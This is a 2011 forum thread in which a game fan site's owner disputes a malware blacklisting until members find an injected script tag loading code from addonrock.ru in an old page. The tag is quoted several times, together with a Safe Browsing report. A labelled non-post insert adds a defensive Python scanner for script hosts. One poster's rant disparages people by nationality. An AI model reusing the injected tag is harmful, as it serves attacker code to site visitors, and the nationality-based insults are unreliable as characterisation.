Post by Pilot on Aug 9, 2011 9:42:43 GMT -5
I understand your frustration, and I am completely sympathetic. NFO, it's not just Google. It's a 3rd party clearinghouse watchdog thing. Even if one does not use Google or any other SE to find the site, the blacklist will appear in a browser/anti-virus/malware/etc. engine and the site will be blocked. That happens due to a valid reason, and it's your onus to repair, secure and de-tag the site. Google and/or Microsoft are not personally conspiring against you. There really is a valid and recent condition on your site that is causing the block. I understand it's a PITA, but don't be so down on it - it is an effective, and unfortunately made-necessary, safety feature at-large on the modern web. No need to name any names. Both old and new school connections appreciate namelessness. Let's honor that at every opportunity, and simply address the issues at hand. That's incorrect. Your site most assuredly directly hosted something malicious last month of this year. I wish I could tell you what it was. If you'll read the output, it spells it out for you. I am not the site owner, so you are privy to far more information than I. If you need any assistance cleaning this up and blocking further exploits, I will be happy to help. I appreciate the fact that you have backups, and are willing to upload them. Please be sure the backups are not infected, and that the uninfected backup is *complete*. If only 1 file is either infected or overlooked, the blacklist will stand. But again, you should be able to view specific information pertaining to exactly what file(s) is/are infected, and how. Again, it's not enough to simply clean it up. You must enact measures to prevent further exploits or you'll jump through all of these hoops just to end up on the blacklist again because your site truly is infected and harmful. 
If the scum that did this to you the first time find the same security breach opportunity, they'll just do it again - and rest assured they'll be fast, expedient and automated and you'll be back to square 1. Surely you do not want to expose your trusted and loyal visitors to any sort of hacker/spammer garbage, right? Old school notwithstanding, we are all forced to jump through new-school hoops, and if one doesn't want their site blacklisted by modern security measures (another discussion), these are the hoops through which one must jump. Again, you have my utmost sympathies. Been there, done that, and even if you know Bill Gates personally, it won't help in this situation. <soapbox>And &*%$ site hackers. We should blacklist them all, and if everyone jumped through THOSE hoops then we wouldn't be having this discussion. THEY are the reason for our problems, and no hoop jumping or extra security measures would be necessary without that scum. And chances are they are NOT American (or UK, Canadian or Australian) which gives me every good reason to hate BACK! And every good 1st World Country citizen should do their part to protect their piece of the internet against 3rd world hacker scum, and support others who are working toward that goal. And hate Microsoft all you want as well, but do remember that without them you'd have to configure your own software to call my dial-up BBS in the US to have this discussion, which wouldn't even be necessary because you wouldn't have had a website to offer in the first place. And I happen to be not only American, but the first female Sysop that I know of EVER, and one of the first 10,000 people on this planet to push FidoNet email around the globe. So, you're sitting there telling me about why "people Hate Americans" (including me, since I am one) because you've let your website become a host to hacker scum garbage and we're just trying to point it out, protect your visitors, and help you fix it?
Tell me - am I wasting my time here?! Need friends? Or do you think you're fine just the way things are? Pick. I'll be happy to back off, sack the site support and vote to pull the troops. With that hateful and unappreciative attitude you've shown me, I'm fine either way at this point - with *everything*. Pick.</soapbox> So, thanks for the hoop jumping. I hope you get it cleaned up and blocked from further attacks (both the site and the country). Again, if you need any assistance (with anything), let me know. Happy to help (unless you hate me and rather I didn't, at which point I'll be happy to leave you on your own). Our paths crossed in this world because we love the same game. I came in here with respect for you. Pam

To quote a peasant in Stronghold 2, "I'm confused." Are you perhaps quoting someone in the brackets that are entitled <soapbox>? I do remember an Australian website by that name; it was a bit of a test of your web-based hacking skills and your powers of observation. I guess it went down some time in 2006. I would also like to ask something else: do you have any ideas what might have caused it? There are tons of sites out there that are more deserving to be tagged than this site. I know that more than a few of the mods or "game hacking" tools may show up as a pseudo virus on different virus scanners, but I don't know of anything here that has tried to hijack a web-browser or self install a virus.
Post by Captain Zedo on Aug 9, 2011 10:49:09 GMT -5
I understand your frustration, and I am completely sympathetic. NFO, it's not just Google. It's a 3rd party clearinghouse watchdog thing. Even if one does not use Google or any other SE to find the site, the blacklist will appear in a browser/anti-virus/malware/etc. engine and the site will be blocked. That happens due to a valid reason, and it's your onus to repair, secure and de-tag the site. Google and/or Microsoft are not personally conspiring against you. There really is a valid and recent condition on your site that is causing the block. I understand it's a PITA, but don't be so down on it - it is an effective, and unfortunately made-necessary, safety feature at-large on the modern web. No need to name any names. Both old and new school connections appreciate namelessness. Let's honor that at every opportunity, and simply address the issues at hand. That's incorrect. Your site most assuredly directly hosted something malicious last month of this year. I wish I could tell you what it was. If you'll read the output, it spells it out for you. I am not the site owner, so you are privy to far more information than I. If you need any assistance cleaning this up and blocking further exploits, I will be happy to help. I appreciate the fact that you have backups, and are willing to upload them. Please be sure the backups are not infected, and that the uninfected backup is *complete*. If only 1 file is either infected or overlooked, the blacklist will stand. But again, you should be able to view specific information pertaining to exactly what file(s) is/are infected, and how. Again, it's not enough to simply clean it up. You must enact measures to prevent further exploits or you'll jump through all of these hoops just to end up on the blacklist again because your site truly is infected and harmful. 
If the scum that did this to you the first time find the same security breach opportunity, they'll just do it again - and rest assured they'll be fast, expedient and automated and you'll be back to square 1. Surely you do not want to expose your trusted and loyal visitors to any sort of hacker/spammer garbage, right? Old school notwithstanding, we are all forced to jump through new-school hoops, and if one doesn't want their site blacklisted by modern security measures (another discussion), these are the hoops through which one must jump. Again, you have my utmost sympathies. Been there, done that, and even if you know Bill Gates personally, it won't help in this situation. <soapbox>And &*%$ site hackers. We should blacklist them all, and if everyone jumped through THOSE hoops then we wouldn't be having this discussion. THEY are the reason for our problems, and no hoop jumping or extra security measures would be necessary without that scum. And chances are they are NOT American (or UK, Canadian or Australian) which gives me every good reason to hate BACK! And every good 1st World Country citizen should do their part to protect their piece of the internet against 3rd world hacker scum, and support others who are working toward that goal. And hate Microsoft all you want as well, but do remember that without them you'd have to configure your own software to call my dial-up BBS in the US to have this discussion, which wouldn't even be necessary because you wouldn't have had a website to offer in the first place. And I happen to be not only American, but the first female Sysop that I know of EVER, and one of the first 10,000 people on this planet to push FidoNet email around the globe. So, you're sitting there telling me about why "people Hate Americans" (including me, since I am one) because you've let your website become a host to hacker scum garbage and we're just trying to point it out, protect your visitors, and help you fix it?
Tell me - am I wasting my time here?! Need friends? Or do you think you're fine just the way things are? Pick. I'll be happy to back off, sack the site support and vote to pull the troops. With that hateful and unappreciative attitude you've shown me, I'm fine either way at this point - with *everything*. Pick.</soapbox> So, thanks for the hoop jumping. I hope you get it cleaned up and blocked from further attacks (both the site and the country). Again, if you need any assistance (with anything), let me know. Happy to help (unless you hate me and rather I didn't, at which point I'll be happy to leave you on your own). Our paths crossed in this world because we love the same game. I came in here with respect for you. Pam

Yeah, I get a lot of people saying it *must* be infected, but can't quite find the actual line or script outside the Google warning. There is no malicious script in the site. When you get the warning go to the site. View the source code. Find the malicious scripting as in actual statements. I do this daily and haven't found anything since the warnings started. The script Google claims to exist simply doesn't. *Look for yourself*!
Post by RoadDemon on Aug 9, 2011 12:57:27 GMT -5
I get a virus-warning from my virus scanner (Avast!) when going to this address.. zedo.hardwar.org.uk/maps/mainmapindex.htm Infection: HTML:Script-inf Maybe that has something to do with Google blocking the forum? Could it be something related to what rotary posted? I got the same warnings when I went to that link.
Post by Captain Zedo on Aug 9, 2011 15:57:35 GMT -5
I had a couple of times warnings pop up over flash scripts not too long ago when visiting the forum. Btw. why is it that the forum is also warned against? Since you are talking about Zedo's website. Because the forum is quite new and hosted somewhere else, proboards. Is it not just that the name Zedo is also a virus or spyware or tracking cookie called Zedo?

duncan: There is a company that uses "zedo" in its name that does issue commercial cookies. They cause no harm, but are 3rd party tracking cookies. They also do some click-based advertising. I haven't heard of them much lately, but they are still around. I pre-date them by several years and have no relationship to them. Google's problem is that they are simply wrong, often are, never admit it, and don't improve anything. In a new post, I've posted a full page of source code that Google claims is infected. It was taken right from my browser's source code viewer and pasted, in full, to the post. If you can find an infection overlooked by me and my software, please point it out. If you can't find one, point that out to Google and its supporters.
Post by Pilot on Aug 9, 2011 17:31:52 GMT -5
Hey Zedo, try removing the following from the bottom line of mainmapindex.htm,
Code: <script type="text/javascript" src="http://addonrock.ru/Paste.js"></script>
I noticed the site was trying to connect to that .ru (russian) link when I loaded the page.
<EDIT> Please take notice of the bold. Safe Browsing Diagnostic page for addonrock.ru
What is the current listing status for addonrock.ru?
Site is listed as suspicious - visiting this web site may harm your computer.
What happened when Google visited this site?
Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09.
This site was hosted on 1 network(s) including AS42755 (ICTALPHEN).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page. If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. </EDIT>
Post by Captain Zedo on Aug 10, 2011 5:03:13 GMT -5
Hey Zedo, try removing the following from the bottom line of mainmapindex.htm, Code: <script type="text/javascript" src="http://addonrock.ru/Paste.js"></script> I noticed the site was trying to connect to that .ru (russian) link when I loaded the page. <EDIT> Please take notice of the bold. Safe Browsing Diagnostic page for addonrock.ru What is the current listing status for addonrock.ru? Site is listed as suspicious - visiting this web site may harm your computer. What happened when Google visited this site? Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09. This site was hosted on 1 network(s) including AS42755 (ICTALPHEN). Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites. Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/. How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. Next steps: Return to the previous page. If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. </EDIT>

Pilot: Where?! That code is not on the page being served. If I overlooked it give me a line number or copy and paste the code with the code around it *in the posted code*. I'll take your word for it on your machine. I can only fix the served pages. The full code of the source on the server is posted in the "Site Not Infected" post.
I also encourage others to check the source code and look at <script> tags to check for a redirect other than the Atomz search engine. If you are seeing them, the problem may be with the server. In that sad case, I'll have to change servers. There is always the possibility that some viewer computers are infected with something that's redirecting them on several sites. The old Antagonist virus did this. Despite what Google has to say either way, I test the site's integrity every month. So far this year, I haven't had any problems at all. The site does have a lot of dead links which causes warnings with some web analyzers. As a final interesting note. The site on the main server has been mirrored, including work by Roaddemon, and no virus is found. To test Google, I've made a private mirror to see if it gets blocked. It has not even though Google has spidered it twice. Same exact site that's being blocked at hardwar.org.uk. That makes me very suspicious of Google's methods. By the way, Google's webmaster tools are shit. They have never solved a problem. They are a font for the professional (read for-pay) tools that don't work, either.
Post by pamiam on Aug 10, 2011 21:52:09 GMT -5
Zedo, the process has worked for me in this same circumstance, and it'll work just as well for you. You just have to accept the fact that your site has a problem, fix it, and run it through the check engines until it's done.
Moreover, you have to secure the site so that the bots don't just put the same stuff back out there.
It's free, and it's a tedious process. Suck it up or not. The first step is admitting you have a problem. /shrug
Post by pamiam on Aug 10, 2011 21:55:40 GMT -5
Listen, if you need help on fixing this I will be happy to do that. Package up all of your files, and post them somewhere for me to DL. I'll clean the site and send them out for you to pick up and upload.
However, the site security problem will still exist. You'll have to fix that, or let someone into the site who can.
Post by pamiam on Aug 10, 2011 22:01:30 GMT -5
The book 'Failed States' by Noam Chomsky paints a nice picture of why people hate Americans, and Brits.

I am NOT a hater, and I don't read the propaganda of anyone who provokes or perpetrates hate. I do, however, respond when someone says they hate ME, particularly when it's for some arbitrary reason like where I happened to be BORN. Look, we are here because we all love hardwar. Isn't that enough to promote a little kinship and respect??
Post by pamiam on Aug 10, 2011 22:08:38 GMT -5
Hey Zedo, try removing the following from the bottom line of mainmapindex.htm, Code: <script type="text/javascript" src="http://addonrock.ru/Paste.js"></script> I noticed the site was trying to connect to that .ru (russian) link when I loaded the page. <EDIT> Please take notice of the bold. Safe Browsing Diagnostic page for addonrock.ru What is the current listing status for addonrock.ru? Site is listed as suspicious - visiting this web site may harm your computer. What happened when Google visited this site? Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09. This site was hosted on 1 network(s) including AS42755 (ICTALPHEN). Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites. Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/. How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. Next steps: Return to the previous page. If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. </EDIT> Pilot: Where?! That code is not on the page being served.

I concur with the listed analysis. Even BEFORE you clean the files you must set up security measures to keep the hacker scum bots from re-infecting the site. They tend to do it pretty much immediately. It's like trying to mop up after a broken pipe, without fixing the pipe first.
The first step in fixing a problem is admitting you actually have one and moving on to address it. Denial and finger-pointing isn't fixing anything or helping anyone. It really is a very real and immediate recurring problem on your site which needs to be addressed for the protection of both you and your visitors - moreover, to deny 3rd world hacker scum any victory over sites like yours. It's a game they play, and right now they're winning.
Post by cobra on Aug 11, 2011 6:52:17 GMT -5
As a final interesting note. The site on the main server has been mirrored, including work by Roaddemon, and no virus is found. To test Google, I've made a private mirror to see if it gets blocked. It has not even though Google has spidered it twice. Same exact site that's being blocked at hardwar.org.uk

This makes me seriously wonder what's happening.
Post by Pilot on Aug 11, 2011 12:53:47 GMT -5
Thank you Roaddemon for pointing it out. ^^
Post by Captain Zedo on Aug 11, 2011 20:56:40 GMT -5
Zedo, the process has worked for me in this same circumstance, and it'll work just as well for you. You just have to accept the fact that your site has a problem, fix it, and run it through the check engines until it's done. Moreover, you have to secure the site so that the bots don't just put the same stuff back out there. It's free, and it's a tedious process. Suck it up or not. The first step is admitting you have a problem. /shrug

I did find a problem! Or, more accurately, it was found by Pilot and others. It was in a subfolder I haven't updated in years. I've replaced the files from that folder and have scanned two other storage folders I use on that server. The software applying the bots was discovered and removed from the server quite a while back. It was the only attack of which I am aware that affected my site. I don't own or administrate the server. On the other hand, the problems Google allege have never existed. Their claims of an infected main page, etc. are patently false. I'm not sure if the RU script was even in the long, long list of malware I was accused of hosting. I have also caught them lying about the dates and times they claimed to have visited the site. I'm grateful for the real help provided by those who found the script, but I doubt it will do anything toward Google unblocking my site. That's just not how Google works. You may be wasting your time here, but that's for you to decide. I've never blocked any account or censored any posting (other than deleting some spam). I've got nothing against you. I don't know you. But, you've just been posting the same Google quotes I've heard before. The pilots that found the script in the old map folder are the real heroes in this. I *have* gone through the tedious Google process and have seen no results, received no help or insight. Their list of malware on the site is unsubstantiated - they can't even tell me where all of these horrors lie.
I turn, as I have in the past, to the site's viewers for help and they have come through yet again.
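Added example, not part of any post in this thread: the injected tag turned up in an old subfolder rather than on the main page, so a check has to cover every HTML file on the server, not just the pages viewed day to day. This Python sketch lists each script tag whose src host is not on an allow-list; the allow-listed host search.example.com and the sample site tree are constructed placeholders.

```python
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlsplit

HTML_EXTENSIONS = (".htm", ".html")


class ScriptSrcCollector(HTMLParser):
    """Collect (line_number, src) for every <script src=...> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append((self.getpos()[0], src.strip()))


def external_host(src):
    """Host of an absolute or protocol-relative URL, or None for a relative path."""
    host = urlsplit(src).hostname
    return host.lower() if host else None


def audit_tree(root, allowed_hosts):
    """Walk every HTML file under root; report script hosts not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(HTML_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            # errors="replace" so an odd encoding in an old file cannot hide it
            with open(path, encoding="utf-8", errors="replace") as fh:
                parser = ScriptSrcCollector()
                parser.feed(fh.read())
            for line, src in parser.sources:
                host = external_host(src)
                if host and host not in allowed:
                    findings.append((os.path.relpath(path, root), line, host, src))
    return sorted(findings)


def demo():
    """Build a small constructed site tree and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "maps"))
        # Clean main page: one local script, one allow-listed search script.
        with open(os.path.join(root, "index.htm"), "w", encoding="utf-8") as fh:
            fh.write('<html><head>\n<script src="js/menu.js"></script>\n'
                     '<script src="http://search.example.com/s.js"></script>\n'
                     '</head><body>Main page</body></html>\n')
        # Old subfolder page with the tag from the thread appended as its last line.
        with open(os.path.join(root, "maps", "mainmapindex.htm"), "w",
                  encoding="utf-8") as fh:
            fh.write('<html><body>\nOld map index\n</body></html>\n'
                     '<script type="text/javascript" '
                     'src="http://addonrock.ru/Paste.js"></script>\n')
        return audit_tree(root, allowed_hosts={"search.example.com"})


if __name__ == "__main__":
    for path, line, host, src in demo():
        print(f"{path}:{line}: script loaded from unlisted host {host} ({src})")
```

Run against a backup before uploading it as well as against the live tree, since a single overlooked file is enough to keep the listing in place.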
Post by pamiam on Aug 12, 2011 23:32:28 GMT -5
Hooray! You found one!
Google really will tell you where and what. I know they are cryptic sometimes, but read it in geekenise.
Again, while Google is the most helpful site out there, they are not the blacklist powers that be. That's a clearinghouse, and they are FAR more difficult to deal with than Google. Google is a mere liaison.
My browser still sends a warning, and Google has nothing to do with it, so the site is still not cleared - even if it is clean.
I sympathize and understand what a tedious pain it is not only to clean a site, but to clear it.
You have my wishes and utmost sympathy on this. And do be sure to ban that hacker scum. They are the cause of your problems, period.
Post by Captain Zedo on Aug 13, 2011 6:14:02 GMT -5
Hooray! You found one! Google really will tell you where and what. I know they are cryptic sometimes, but read it in geekenise. Again, while Google is the most helpful site out there, they are not the blacklist powers that be. That's a clearinghouse, and they are FAR more difficult to deal with than Google. Google is a mere liaison. My browser still sends a warning, and Google has nothing to do with it, so the site is still not cleared - even if it is clean. I sympathize and understand what a tedious pain it is not only to clean a site, but to clear it. You have my wishes and utmost sympathy on this. And do be sure to ban that hacker scum. They are the cause of your problems, period.

pamiam: Google does *not* accurately tell a webmaster where and how they are infected. That's simply not true. They got my site wrong and you can see it for yourself by viewing the pages here! Google's claims are unfounded and they missed a scripted redirect that did exist. That's as wrong as it gets. Google has been dead wrong on the more than one dozen viruses it claims the site currently contains. Please find them if you think there is an oversight. Google can't. They think my old frames-busting script is malicious. Well, it is to them because it screws up their hijacking of copyrighted content. I've gone through the Google process with many clients many times and Google is just simply full of shit. I always check the Google references and they are *never* what is claimed where it is claimed to be. Not once in a decade of this. I also challenge you to find a blocked site that carries Google Ads, even *with* the presence of malware. There isn't one. Google Ad sites can do no wrong. Visiting them is your real danger because there will be no warnings even if there is malware. UK Web Guy seems to know how to run a server. They've only had two problems in over 12 years. *Way* better than average. It's run better than when I owned the server.
I have no problem in following the Google process. There's no reason to insult me by implying that I wouldn't understand geek. You have no idea... Thanks again to the pilots that found the script redirect in the old maps folder.